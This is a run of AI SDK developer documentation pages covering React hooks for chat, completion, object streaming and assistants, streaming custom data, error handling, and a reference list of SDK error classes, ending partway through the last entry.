This component will display the weather information for a given location. It takes three props: temperature, weather, and location (exactly what the weatherTool returns).

Render the Weather Component

Now that you have your tool and corresponding React component, let's integrate them into your chat interface. You'll render the Weather component when the model calls the weather tool.

To check if the model has called a tool, you can use the toolInvocations property of the message object. This property contains information about any tools that were invoked in that generation including toolCallId, toolName, args, toolState, and result.

Update your page.tsx file:

'use client';

import { useChat } from '@ai-sdk/react';
import { Weather } from '@/components/weather';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit } = useChat();

  return (
    <div>
      {messages.map(message => (
        <div key={message.id}>
          <div>{message.role === 'user' ? 'User: ' : 'AI: '}</div>
          <div>{message.content}</div>

          <div>
            {message.toolInvocations?.map(toolInvocation => {
              const { toolName, toolCallId, state } = toolInvocation;

              if (state === 'result') {
                if (toolName === 'displayWeather') {
                  const { result } = toolInvocation;
                  return (
                    <div key={toolCallId}>
                      <Weather {...result} />
                    </div>
                  );
                }
              } else {
                return (
                  <div key={toolCallId}>
                    {toolName === 'displayWeather' ? (
                      <div>Loading weather...</div>
                    ) : null}
                  </div>
                );
              }
            })}
          </div>
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={handleInputChange}
          placeholder="Type a message..."
        />
        <button type="submit">Send</button>
      </form>
    </div>
  );
}

In this updated code snippet, you:

Check if the message has toolInvocations.
Check if the tool invocation state is 'result'.
If it's a result and the tool name is 'displayWeather', render the Weather component.
If the tool invocation state is not 'result', show a loading message.

This approach allows you to dynamically render UI components based on the model's responses, creating a more interactive and context-aware chat experience.

Expanding Your Generative UI Application

You can enhance your chat application by adding more tools and components, creating a richer and more versatile user experience. Here's how you can expand your application:

Adding More Tools

To add more tools, simply define them in your ai/tools.ts file:

// Add a new stock tool
export const stockTool = createTool({
  description: 'Get price for a stock',
  parameters: z.object({
    symbol: z.string().describe('The stock symbol to get the price for'),
  }),
  execute: async function ({ symbol }) {
    // Simulated API call
    await new Promise(resolve => setTimeout(resolve, 2000));
    return { symbol, price: 100 };
  },
});

// Update the tools object
export const tools = {
  displayWeather: weatherTool,
  getStockPrice: stockTool,
};

Now, create a new file called components/stock.tsx:

type StockProps = {
  price: number;
  symbol: string;
};

export const Stock = ({ price, symbol }: StockProps) => {
  return (
    <div>
      <h2>Stock Information</h2>
      <p>Symbol: {symbol}</p>
      <p>Price: ${price}</p>
    </div>
  );
};

Finally, update your page.tsx file to include the new Stock component:

'use client';

import { useChat } from '@ai-sdk/react';
import { Weather } from '@/components/weather';
import { Stock } from '@/components/stock';

export default function Page() {
  const { messages, input, setInput, handleSubmit } = useChat();

  return (
    <div>
      {messages.map(message => (
        <div key={message.id}>
          <div>{message.role}</div>
          <div>{message.content}</div>

          <div>
            {message.toolInvocations?.map(toolInvocation => {
              const { toolName, toolCallId, state } = toolInvocation;

              if (state === 'result') {
                if (toolName === 'displayWeather') {
                  const { result } = toolInvocation;
                  return (
                    <div key={toolCallId}>
                      <Weather {...result} />
                    </div>
                  );
                } else if (toolName === 'getStockPrice') {
                  const { result } = toolInvocation;
                  return <Stock key={toolCallId} {...result} />;
                }
              } else {
                return (
                  <div key={toolCallId}>
                    {toolName === 'displayWeather' ? (
                      <div>Loading weather...</div>
                    ) : toolName === 'getStockPrice' ? (
                      <div>Loading stock price...</div>
                    ) : (
                      <div>Loading...</div>
                    )}
                  </div>
                );
              }
            })}
          </div>
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          type="text"
          value={input}
          onChange={event => {
            setInput(event.target.value);
          }}
        />
        <button type="submit">Send</button>
      </form>
    </div>
  );
}

By following this pattern, you can continue to add more tools and components, expanding the capabilities of your Generative UI application.

title: Completion description: Learn how to use the useCompletion hook.

Completion

The useCompletion hook allows you to create a user interface to handle text completions in your application. It enables the streaming of text completions from your AI provider, manages the state for chat input, and updates the UI automatically as new messages are received.

In this guide, you will learn how to use the useCompletion hook in your application to generate text completions and stream them in real-time to your users.

Example

'use client';

import { useCompletion } from '@ai-sdk/react';

export default function Page() {
  const { completion, input, handleInputChange, handleSubmit } = useCompletion({
    api: '/api/completion',
  });

  return (
    <form onSubmit={handleSubmit}>
      <input
        name="prompt"
        value={input}
        onChange={handleInputChange}
        id="input"
      />
      <button type="submit">Submit</button>
      <div>{completion}</div>
    </form>
  );
}

import { streamText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { prompt }: { prompt: string } = await req.json();

  const result = streamText({
    model: openai('gpt-3.5-turbo'),
    prompt,
  });

  return result.toDataStreamResponse();
}

In the Page component, the useCompletion hook will request to your AI provider endpoint whenever the user submits a message. The completion is then streamed back in real-time and displayed in the UI.

This enables a seamless text completion experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.

Customized UI

useCompletion also provides ways to manage the prompt via code, show loading and error states, and update messages without being triggered by user interactions.

Loading and error states

To show a loading spinner while the chatbot is processing the user's message, you can use the isLoading state returned by the useCompletion hook:

const { isLoading, ... } = useCompletion()

return(
  <>
    {isLoading ? <Spinner /> : null}
  </>
)

Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, or show a toast notification:

const { error, ... } = useCompletion()

useEffect(() => {
  if (error) {
    toast.error(error.message)
  }
}, [error])

// Or display the error message in the UI:
return (
  <>
    {error ? <div>{error.message}</div> : null}
  </>
)

Controlled input

The following example demonstrates how to use more granular APIs like setInput with your custom input and submit button components:

const { input, setInput } = useCompletion();

return (
  <>
    <MyCustomInput value={input} onChange={value => setInput(value)} />
  </>
);

Cancelation

It's also a common use case to abort the response message while it's still streaming back from the AI provider. You can do this by calling the stop function returned by the useCompletion hook.

const { stop, isLoading, ... } = useCompletion()

return (
  <>
    <button onClick={stop} disabled={!isLoading}>Stop</button>
  </>
)

When the user clicks the "Stop" button, the fetch request will be aborted. This avoids consuming unnecessary resources and improves the UX of your application.

Throttling UI Updates

This feature is currently only available for React.

By default, the useCompletion hook will trigger a render every time a new chunk is received. You can throttle the UI updates with the experimental_throttle option.

const { completion, ... } = useCompletion({
  // Throttle the completion and data updates to 50ms:
  experimental_throttle: 50
})

Event Callbacks

useCompletion also provides optional event callbacks that you can use to handle different stages of the chatbot lifecycle. These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.

const { ... } = useCompletion({
  onResponse: (response: Response) => {
    console.log('Received response from server:', response)
  },
  onFinish: (message: Message) => {
    console.log('Finished streaming message:', message)
  },
  onError: (error: Error) => {
    console.error('An error occurred:', error)
  },
})

Configure Request Options

By default, the useCompletion hook sends a HTTP POST request to the /api/completion endpoint with the prompt as part of the request body. You can customize the request by passing additional options to the useCompletion hook:

const { messages, input, handleInputChange, handleSubmit } = useCompletion({
  api: '/api/custom-completion',
  headers: {
    Authorization: 'your_token',
  },
  body: {
    user_id: '123',
  },
  credentials: 'same-origin',
});

In this example, the useCompletion hook sends a POST request to the /api/completion endpoint with the specified headers, additional body fields, and credentials for that fetch request. On your server side, you can handle the request with these additional information.

title: Object Generation description: Learn how to use the useObject hook.

Object Generation

useObject is an experimental feature and only available in React.

The useObject hook allows you to create interfaces that represent a structured JSON object that is being streamed.

In this guide, you will learn how to use the useObject hook in your application to generate UIs for structured data on the fly.

Example

The example shows a small notifications demo app that generates fake notifications in real-time.

Schema

It is helpful to set up the schema in a separate file that is imported on both the client and server.

import { z } from 'zod';

// define a schema for the notifications
export const notificationSchema = z.object({
  notifications: z.array(
    z.object({
      name: z.string().describe('Name of a fictional person.'),
      message: z.string().describe('Message. Do not use emojis or links.'),
    }),
  ),
});

Client

The client uses useObject to stream the object generation process.

The results are partial and are displayed as they are received. Please note the code for handling undefined values in the JSX.

'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';

export default function Page() {
  const { object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
  });

  return (
    <>
      <button onClick={() => submit('Messages during finals week.')}>
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </>
  );
}

Server

On the server, we use streamObject to stream the object generation process.

import { openai } from '@ai-sdk/openai';
import { streamObject } from 'ai';
import { notificationSchema } from './schema';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const context = await req.json();

  const result = streamObject({
    model: openai('gpt-4-turbo'),
    schema: notificationSchema,
    prompt:
      `Generate 3 notifications for a messages app in this context:` + context,
  });

  return result.toTextStreamResponse();
}

Customized UI

useObject also provides ways to show loading and error states:

Loading State

The isLoading state returned by the useObject hook can be used for several purposes:

To show a loading spinner while the object is generated.
To disable the submit button.

'use client';

import { useObject } from '@ai-sdk/react';

export default function Page() {
  const { isLoading, object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
  });

  return (
    <>
      {isLoading && <Spinner />}

      <button
        onClick={() => submit('Messages during finals week.')}
        disabled={isLoading}
      >
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </>
  );
}

Stop Handler

The stop function can be used to stop the object generation process. This can be useful if the user wants to cancel the request or if the server is taking too long to respond.

'use client';

import { useObject } from '@ai-sdk/react';

export default function Page() {
  const { isLoading, stop, object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
  });

  return (
    <>
      {isLoading && (
        <button type="button" onClick={() => stop()}>
          Stop
        </button>
      )}

      <button onClick={() => submit('Messages during finals week.')}>
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </>
  );
}

Error State

Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, or to disable the submit button:

'use client';

import { useObject } from '@ai-sdk/react';

export default function Page() {
  const { error, object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
  });

  return (
    <>
      {error && <div>An error occurred.</div>}

      <button onClick={() => submit('Messages during finals week.')}>
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </>
  );
}

Event Callbacks

useObject provides optional event callbacks that you can use to handle life-cycle events.

onFinish: Called when the object generation is completed.
onError: Called when an error occurs during the fetch request.

These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.

'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';

export default function Page() {
  const { object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
    onFinish({ object, error }) {
      // typed object, undefined if schema validation fails:
      console.log('Object generation completed:', object);

      // error, undefined if schema validation succeeds:
      console.log('Schema validation error:', error);
    },
    onError(error) {
      // error during fetch request:
      console.error('An error occurred:', error);
    },
  });

  return (
    <div>
      <button onClick={() => submit('Messages during finals week.')}>
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </div>
  );
}

Configure Request Options

You can configure the API endpoint, optional headers and credentials using the api, headers and credentials settings.

const { submit, object } = useObject({
  api: '/api/use-object',
  headers: {
    'X-Custom-Header': 'CustomValue',
  },
  credentials: 'include',
  schema: yourSchema,
});

title: OpenAI Assistants description: Learn how to use the useAssistant hook.

OpenAI Assistants

The useAssistant hook allows you to handle the client state when interacting with an OpenAI compatible assistant API. This hook is useful when you want to integrate assistant capabilities into your application, with the UI updated automatically as the assistant is streaming its execution.

The useAssistant hook is supported in @ai-sdk/react, ai/svelte, and ai/vue.

Example

'use client';

import { Message, useAssistant } from '@ai-sdk/react';

export default function Chat() {
  const { status, messages, input, submitMessage, handleInputChange } =
    useAssistant({ api: '/api/assistant' });

  return (
    <div>
      {messages.map((m: Message) => (
        <div key={m.id}>
          <strong>{`${m.role}: `}</strong>
          {m.role !== 'data' && m.content}
          {m.role === 'data' && (
            <>
              {(m.data as any).description}
              <br />
              <pre className={'bg-gray-200'}>
                {JSON.stringify(m.data, null, 2)}
              </pre>
            </>
          )}
        </div>
      ))}

      {status === 'in_progress' && <div />}

      <form onSubmit={submitMessage}>
        <input
          disabled={status !== 'awaiting_message'}
          value={input}
          placeholder="What is the temperature in the living room?"
          onChange={handleInputChange}
        />
      </form>
    </div>
  );
}

import { AssistantResponse } from 'ai';
import OpenAI from 'openai';

const openai = new OpenAI({
  apiKey: process.env.OPENAI_API_KEY || '',
});

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  // Parse the request body
  const input: {
    threadId: string | null;
    message: string;
  } = await req.json();

  // Create a thread if needed
  const threadId = input.threadId ?? (await openai.beta.threads.create({})).id;

  // Add a message to the thread
  const createdMessage = await openai.beta.threads.messages.create(threadId, {
    role: 'user',
    content: input.message,
  });

  return AssistantResponse(
    { threadId, messageId: createdMessage.id },
    async ({ forwardStream, sendDataMessage }) => {
      // Run the assistant on the thread
      const runStream = openai.beta.threads.runs.stream(threadId, {
        assistant_id:
          process.env.ASSISTANT_ID ??
          (() => {
            throw new Error('ASSISTANT_ID is not set');
          })(),
      });

      // forward run status would stream message deltas
      let runResult = await forwardStream(runStream);

      // status can be: queued, in_progress, requires_action, cancelling, cancelled, failed, completed, or expired
      while (
        runResult?.status === 'requires_action' &&
        runResult.required_action?.type === 'submit_tool_outputs'
      ) {
        const tool_outputs =
          runResult.required_action.submit_tool_outputs.tool_calls.map(
            (toolCall: any) => {
              const parameters = JSON.parse(toolCall.function.arguments);

              switch (toolCall.function.name) {
                // configure your tool calls here

                default:
                  throw new Error(
                    `Unknown tool call function: ${toolCall.function.name}`,
                  );
              }
            },
          );

        runResult = await forwardStream(
          openai.beta.threads.runs.submitToolOutputsStream(
            threadId,
            runResult.id,
            { tool_outputs },
          ),
        );
      }
    },
  );
}

Customized UI

useAssistant also provides ways to manage the chat message and input states via code and show loading and error states.

Loading and error states

To show a loading spinner while the assistant is running the thread, you can use the status state returned by the useAssistant hook:

const { status, ... } = useAssistant()

return(
  <>
    {status === "in_progress" ? <Spinner /> : null}
  </>
)

Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, or show a toast notification:

const { error, ... } = useAssistant()

useEffect(() => {
  if (error) {
    toast.error(error.message)
  }
}, [error])

// Or display the error message in the UI:
return (
  <>
    {error ? <div>{error.message}</div> : null}
  </>
)

Controlled input

The following example demonstrates how to use more granular APIs like append with your custom input and submit button components:

const { append } = useAssistant();

return (
  <>
    <MySubmitButton
      onClick={() => {
        // Send a new message to the AI provider
        append({
          role: 'user',
          content: input,
        });
      }}
    />
  </>
);

Configure Request Options

By default, the useAssistant hook sends a HTTP POST request to the /api/assistant endpoint with the prompt as part of the request body. You can customize the request by passing additional options to the useAssistant hook:

const { messages, input, handleInputChange, handleSubmit } = useAssistant({
  api: '/api/custom-completion',
  headers: {
    Authorization: 'your_token',
  },
  body: {
    user_id: '123',
  },
  credentials: 'same-origin',
});

In this example, the useAssistant hook sends a POST request to the /api/custom-completion endpoint with the specified headers, additional body fields, and credentials for that fetch request. On your server side, you can handle the request with these additional information.

title: Streaming Custom Data description: Learn how to stream custom data to the client.

Streaming Custom Data

It is often useful to send additional data alongside the model's response. For example, you may want to send status information, the message ids after storing them, or references to content that the language model is referring to.

The AI SDK provides several helpers that allows you to stream additional data to the client and attach it either to the Message or to the data object of the useChat hook:

createDataStream: creates a data stream
createDataStreamResponse: creates a response object that streams data
pipeDataStreamToResponse: pipes a data stream to a server response object

The data is streamed as part of the response stream.

Sending Custom Data from the Server

In your server-side route handler, you can use createDataStreamResponse and pipeDataStreamToResponse in combination with streamText. You need to:

Call createDataStreamResponse or pipeDataStreamToResponse to get a callback function with a DataStreamWriter.
Write to the DataStreamWriter to stream additional data.
Merge the streamText result into the DataStreamWriter.
Return the response from createDataStreamResponse (if that method is used)

Here is an example:

import { openai } from '@ai-sdk/openai';
import { generateId, createDataStreamResponse, streamText } from 'ai';

export async function POST(req: Request) {
  const { messages } = await req.json();

  // immediately start streaming (solves RAG issues with status, etc.)
  return createDataStreamResponse({
    execute: dataStream => {
      dataStream.writeData('initialized call');

      const result = streamText({
        model: openai('gpt-4o'),
        messages,
        onChunk() {
          dataStream.writeMessageAnnotation({ chunk: '123' });
        },
        onFinish() {
          // message annotation:
          dataStream.writeMessageAnnotation({
            id: generateId(), // e.g. id from saved DB record
            other: 'information',
          });

          // call annotation:
          dataStream.writeData('call completed');
        },
      });

      result.mergeIntoDataStream(dataStream);
    },
    onError: error => {
      // Error messages are masked by default for security reasons.
      // If you want to expose the error message to the client, you can do so here:
      return error instanceof Error ? error.message : String(error);
    },
  });
}

Sending Custom Sources

You can send custom sources to the client using the writeSource method on the DataStreamWriter:

import { openai } from '@ai-sdk/openai';
import { createDataStreamResponse, streamText } from 'ai';

export async function POST(req: Request) {
  const { messages } = await req.json();

  return createDataStreamResponse({
    execute: dataStream => {
      // write a custom url source to the stream:
      dataStream.writeSource({
        sourceType: 'url',
        id: 'source-1',
        url: 'https://example.com',
        title: 'Example Source',
      });

      const result = streamText({
        model: openai('gpt-4o'),
        messages,
      });

      result.mergeIntoDataStream(dataStream);
    },
  });
}

Processing Custom Data in `useChat`

The useChat hook automatically processes the streamed data and makes it available to you.

Accessing Data

On the client, you can destructure data from the useChat hook which stores all StreamData as a JSONValue[].

import { useChat } from '@ai-sdk/react';

const { data } = useChat();

Accessing Message Annotations

Each message from the useChat hook has an optional annotations property that contains the message annotations sent from the server.

Since the shape of the annotations depends on what you send from the server, you have to destructure them in a type-safe way on the client side.

Here we just show the annotations as a JSON string:

import { Message, useChat } from '@ai-sdk/react';

const { messages } = useChat();

const result = (
  <>
    {messages?.map((m: Message) => (
      <div key={m.id}>
        {m.annotations && <>{JSON.stringify(m.annotations)}</>}
      </div>
    ))}
  </>
);

Updating and Clearing Data

You can update and clear the data object of the useChat hook using the setData function.

const { setData } = useChat();

// clear existing data
setData(undefined);

// set new data
setData([{ test: 'value' }]);

// transform existing data, e.g. adding additional values:
setData(currentData => [...currentData, { test: 'value' }]);

Example: Clear on Submit

'use client';

import { Message, useChat } from '@ai-sdk/react';

export default function Chat() {
  const { messages, input, handleInputChange, handleSubmit, data, setData } =
    useChat();

  return (
    <>
      {data && <pre>{JSON.stringify(data, null, 2)}</pre>}

      {messages?.map((m: Message) => (
        <div key={m.id}>{`${m.role}: ${m.content}`}</div>
      ))}

      <form
        onSubmit={e => {
          setData(undefined); // clear stream data
          handleSubmit(e);
        }}
      >
        <input value={input} onChange={handleInputChange} />
      </form>
    </>
  );
}

title: Error Handling description: Learn how to handle errors in the AI SDK UI

Error Handling

Error Helper Object

Each AI SDK UI hook also returns an error object that you can use to render the error in your UI. You can use the error object to show an error message, disable the submit button, or show a retry button.

'use client';

import { useChat } from '@ai-sdk/react';

export default function Chat() {
  const { messages, input, handleInputChange, handleSubmit, error, reload } =
    useChat({});

  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role}: {m.content}
        </div>
      ))}

      {error && (
        <>
          <div>An error occurred.</div>
          <button type="button" onClick={() => reload()}>
            Retry
          </button>
        </>
      )}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={handleInputChange}
          disabled={error != null}
        />
      </form>
    </div>
  );
}

Alternative: replace last message

Alternatively you can write a custom submit handler that replaces the last message when an error is present.

'use client';

import { useChat } from '@ai-sdk/react';

export default function Chat() {
  const {
    handleInputChange,
    handleSubmit,
    error,
    input,
    messages,
    setMessages,
  } = useChat({});

  function customSubmit(event: React.FormEvent<HTMLFormElement>) {
    if (error != null) {
      setMessages(messages.slice(0, -1)); // remove last message
    }

    handleSubmit(event);
  }

  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role}: {m.content}
        </div>
      ))}

      {error && <div>An error occurred.</div>}

      <form onSubmit={customSubmit}>
        <input value={input} onChange={handleInputChange} />
      </form>
    </div>
  );
}

Error Handling Callback

Errors can be processed by passing an onError callback function as an option to the useChat, useCompletion or useAssistant hooks. The callback function receives an error object as an argument.

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const {
    /* ... */
  } = useChat({
    // handle error:
    onError: error => {
      console.error(error);
    },
  });
}

Injecting Errors for Testing

You might want to create errors for testing. You can easily do so by throwing an error in your route handler:

export async function POST(req: Request) {
  throw new Error('This is a test error');
}

title: Smooth streaming japanese text description: Learn how to stream smooth stream japanese text

Smooth streaming japanese text

You can smooth stream japanese text by using the smoothStream function, and the following regex that splits either on words of japanese characters:

import { smoothStream } from 'ai';
import { useChat } from '@ai-sdk/react';

const { data } = useChat({
  experimental_transform: smoothStream({
    chunking: /[\u3040-\u309F\u30A0-\u30FF]|\S+\s+/,
  }),
});

title: Smooth streaming chinese text description: Learn how to stream smooth stream chinese text

Smooth streaming chinese text

You can smooth stream chinese text by using the smoothStream function, and the following regex that splits either on words of chinese characters:

import { smoothStream } from 'ai';
import { useChat } from '@ai-sdk/react';

const { data } = useChat({
  experimental_transform: smoothStream({
    chunking: /[\u4E00-\u9FFF]|\S+\s+/,
  }),
});

title: AI_APICallError description: Learn how to fix AI_APICallError

AI_APICallError

This error occurs when an API call fails.

Properties

url: The URL of the API request that failed
requestBodyValues: The request body values sent to the API
statusCode: The HTTP status code returned by the API
responseHeaders: The response headers returned by the API
responseBody: The response body returned by the API
isRetryable: Whether the request can be retried based on the status code
data: Any additional data associated with the error

Checking for this Error

You can check if an error is an instance of AI_APICallError using:

import { APICallError } from 'ai';

if (APICallError.isInstance(error)) {
  // Handle the error
}

title: AI_DownloadError description: Learn how to fix AI_DownloadError

AI_DownloadError

This error occurs when a download fails.

Properties

url: The URL that failed to download
statusCode: The HTTP status code returned by the server
statusText: The HTTP status text returned by the server
message: The error message containing details about the download failure

Checking for this Error

You can check if an error is an instance of AI_DownloadError using:

import { DownloadError } from 'ai';

if (DownloadError.isInstance(error)) {
  // Handle the error
}

title: AI_EmptyResponseBodyError description: Learn how to fix AI_EmptyResponseBodyError

AI_EmptyResponseBodyError

This error occurs when the server returns an empty response body.

Properties

message: The error message

Checking for this Error

You can check if an error is an instance of AI_EmptyResponseBodyError using:

import { EmptyResponseBodyError } from 'ai';

if (EmptyResponseBodyError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidArgumentError description: Learn how to fix AI_InvalidArgumentError

AI_InvalidArgumentError

This error occurs when an invalid argument was provided.

Properties

parameter: The name of the parameter that is invalid
value: The invalid value
message: The error message

Checking for this Error

You can check if an error is an instance of AI_InvalidArgumentError using:

import { InvalidArgumentError } from 'ai';

if (InvalidArgumentError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidDataContentError description: How to fix AI_InvalidDataContentError

AI_InvalidDataContentError

This error occurs when the data content provided in a multi-modal message part is invalid. Check out the prompt examples for multi-modal messages .

Properties

content: The invalid content value
message: The error message describing the expected and received content types

Checking for this Error

You can check if an error is an instance of AI_InvalidDataContentError using:

import { InvalidDataContentError } from 'ai';

if (InvalidDataContentError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidDataContent description: Learn how to fix AI_InvalidDataContent

AI_InvalidDataContent

This error occurs when invalid data content is provided.

Properties

content: The invalid content value
message: The error message
cause: The cause of the error

Checking for this Error

You can check if an error is an instance of AI_InvalidDataContent using:

import { InvalidDataContent } from 'ai';

if (InvalidDataContent.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidMessageRoleError description: Learn how to fix AI_InvalidMessageRoleError

AI_InvalidMessageRoleError

This error occurs when an invalid message role is provided.

Properties

role: The invalid role value
message: The error message

Checking for this Error

You can check if an error is an instance of AI_InvalidMessageRoleError using:

import { InvalidMessageRoleError } from 'ai';

if (InvalidMessageRoleError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidPromptError description: Learn how to fix AI_InvalidPromptError

AI_InvalidPromptError

This error occurs when the prompt provided is invalid.

Properties

prompt: The invalid prompt value
message: The error message
cause: The cause of the error

Checking for this Error

You can check if an error is an instance of AI_InvalidPromptError using:

import { InvalidPromptError } from 'ai';

if (InvalidPromptError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidResponseDataError description: Learn how to fix AI_InvalidResponseDataError

AI_InvalidResponseDataError

This error occurs when the server returns a response with invalid data content.

Properties

data: The invalid response data value
message: The error message

Checking for this Error

You can check if an error is an instance of AI_InvalidResponseDataError using:

import { InvalidResponseDataError } from 'ai';

if (InvalidResponseDataError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidToolArgumentsError description: Learn how to fix AI_InvalidToolArgumentsError

AI_InvalidToolArgumentsError

This error occurs when invalid tool argument was provided.

Properties

toolName: The name of the tool with invalid arguments
toolArgs: The invalid tool arguments
message: The error message
cause: The cause of the error

Checking for this Error

You can check if an error is an instance of AI_InvalidToolArgumentsError using:

import { InvalidToolArgumentsError } from 'ai';

if (InvalidToolArgumentsError.isInstance(error)) {
  // Handle the error
}

title: AI_JSONParseError description: Learn how to fix AI_JSONParseError

AI_JSONParseError

This error occurs when JSON fails to parse.

Properties

text: The text value that could not be parsed
message: The error message including parse error details

Checking for this Error

You can check if an error is an instance of AI_JSONParseError using:

import { JSONParseError } from 'ai';

if (JSONParseError.isInstance(error)) {
  // Handle the error
}

title: AI_LoadAPIKeyError description: Learn how to fix AI_LoadAPIKeyError

AI_LoadAPIKeyError

This error occurs when API key is not loaded successfully.

Properties

message: The error message

Checking for this Error

You can check if an error is an instance of AI_LoadAPIKeyError using:

import { LoadAPIKeyError } from 'ai';

if (LoadAPIKeyError.isInstance(error)) {
  // Handle the error
}

title: AI_LoadSettingError description: Learn how to fix AI_LoadSettingError

AI_LoadSettingError

This error occurs when a setting is not loaded successfully.

Properties

message: The error message

Checking for this Error

You can check if an error is an instance of AI_LoadSettingError using:

import { LoadSettingError } from 'ai';

if (LoadSettingError.isInstance(error)) {
  // Handle the error
}

title: AI_MessageConversionError description: Learn how to fix AI_MessageConversionError

AI_MessageConversionError

This error occurs when message conversion fails.

Properties

originalMessage: The original message that failed conversion
message: The error message

Checking for this Error

You can check if an error is an instance of AI_MessageConversionError using:

import { MessageConversionError } from 'ai';

if (MessageConversionError.isInstance(error)) {
  // Handle the error
}

title: AI_NoAudioGeneratedError description: Learn how to fix AI_NoAudioGeneratedError

AI_NoAudioGeneratedError

This error occurs when no audio could be generated from the input.

Properties

responses: Array of responses
message: The error message

Checking for this Error

You can check if an error is an instance of AI_NoAudioGeneratedError using:

import { NoAudioGeneratedError } from 'ai';

if (NoAudioGeneratedError.isInstance(error)) {
  // Handle the error
}

title: AI_NoContentGeneratedError description: Learn how to fix AI_NoContentGeneratedError

AI_NoContentGeneratedError

This error occurs when the AI provider fails to generate content.

Properties

message: The error message

Checking for this Error

You can check if an error is an instance of AI_NoContentGeneratedError using:

import { NoContentGeneratedError } from 'ai';

if (NoContentGeneratedError.isInstance(error)) {
  // Handle the error
}

title: AI_NoImageGeneratedError description: Learn how to fix AI_NoImageGeneratedError

AI_NoImageGeneratedError

This error occurs when the AI provider fails to generate an image. It can arise due to the following reasons:

The model failed to generate a response.
The model generated an invalid response.

Properties

message: The error message.
responses: Metadata about the image model responses, including timestamp, model, and headers.
cause: The cause of the error. You can use this for more detailed error handling.

Checking for this Error

You can check if an error is an instance of AI_NoImageGeneratedError using:

import { generateImage, NoImageGeneratedError } from 'ai';

try {
  await generateImage({ model, prompt });
} catch (error) {
  if (NoImageGeneratedError.isInstance(error)) {
    console.log('NoImageGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

title: AI_NoObjectGeneratedError description: Learn how to fix AI_NoObjectGeneratedError

AI_NoObjectGeneratedError

This error occurs when the AI provider fails to generate a parsable object that conforms to the schema. It can arise due to the following reasons:

The model failed to generate a response.
The model generated a response that could not be parsed.
The model generated a response that could not be validated against the schema.

Properties

message: The error message.
text: The text that was generated by the model. This can be the raw text or the tool call text, depending on the object generation mode.
response: Metadata about the language model response, including response id, timestamp, and model.
usage: Request token usage.
finishReason: Request finish reason. For example 'length' if model generated maximum number of tokens, this could result in a JSON parsing error.
cause: The cause of the error (e.g. a JSON parsing error). You can use this for more detailed error handling.

Checking for this Error

You can check if an error is an instance of AI_NoObjectGeneratedError using:

import { generateObject, NoObjectGeneratedError } from 'ai';

try {
  await generateObject({ model, schema, prompt });
} catch (error) {
  if (NoObjectGeneratedError.isInstance(error)) {
    console.log('NoObjectGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Text:', error.text);
    console.log('Response:', error.response);
    console.log('Usage:', error.usage);
    console.log('Finish Reason:', error.finishReason);
  }
}

title: AI_NoOutputSpecifiedError description: Learn how to fix AI_NoOutputSpecifiedError

AI_NoOutputSpecifiedError

This error occurs when no output format was specified for the AI response, and output-related methods are called.

Properties

message: The error message (defaults to 'No output specified.')

Checking for this Error

You can check if an error is an instance of AI_NoOutputSpecifiedError using:

import { NoOutputSpecifiedError } from 'ai';

if (NoOutputSpecifiedError.isInstance(error)) {
  // Handle the error
}

title: AI_NoSuchModelError description: Learn how to fix AI_NoSuchModelError

AI_NoSuchModelError

This error occurs when a model ID is not found.

Properties

modelId: The ID of the model that was not found
modelType: The type of model
message: The error message

Checking for this Error

You can check if an error is an instance of AI_NoSuchModelError using:

import { NoSuchModelError } from 'ai';

if (NoSuchModelError.isInstance(error)) {
  // Handle the error
}

title: AI_NoSuchProviderError description: Learn how to fix AI_NoSuchProviderError

AI_NoSuchProviderError

This error occurs when a provider ID is not found.

Properties

providerId: The ID of the provider that was not found
availableProviders: Array of available provider IDs
modelId: The ID of the model
modelType: The type of model
message: The error message

Checking for this Error

